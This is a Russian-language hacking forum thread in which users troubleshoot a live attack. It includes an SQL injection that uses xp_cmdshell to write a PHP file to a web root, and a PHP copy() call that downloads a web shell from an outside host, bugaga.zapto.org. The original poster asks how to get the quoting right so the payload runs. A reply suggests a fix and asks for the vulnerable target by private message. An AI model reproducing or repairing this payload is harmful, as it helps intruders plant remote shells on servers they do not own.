"\$" обозначает символ "$" чтоб следующий текст не был интерполирован как переменная.

copy('http://bugaga.zapto.org/shell.txt','shell.php')

Как сделать так чтобы ковычки не замечала?
Я в том смысле что у меня ошибку пишет при выполнении (именно мешают ковычки)
Что делать? знак "\" перед ковычками не помогает(

Где оно замечает ковычки?

diznt, а можно поконкретнее? Ты юзаешь багу? Если да, то там, скорее всего, стоят мэджики, которые ты никак не обойдешь.

Кто поможет дописать парсер\граббер ? почти всё написано ... точнее код был , но сейчас с донором что то не в порядке
контакты в пм или пишите в icq 45девять\девять3333 , +5 дам (:

'; USE Master exec xp_cmdshell 'echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>" > C:\AppServ\www\shell1.php';--

Вроде через бд все это делаеться (дело все не в этом через что делаеться)

дело в том что команда сама не может выполниться так как ковычки присуствуют и они закрывают консольную команду

diznt, а что тебе мешает просто вместо одинарных двойные поставить и код изменить? Кста, это вообще хз что, а не код echo "<?php copy('http://bugaga.zapto.org/shell.txt','shell.php') ?>
Кста, скинь свою аську и уязвимость в пм, плз

http://forum.antichat.ru/private.php?do=newpm&userid=59362

Спасибо попробую... А то я совсем забыл cmd команды

На сайте madnet.name/tools/madss/
есть такая штука что забиваешь туда сайт а он тебе высвечивает нектрые файлы которые доступны для просмотра (думаю поняли мою мысль)
Так вот как интересует откуда он это берет? (точнее откуда грабит)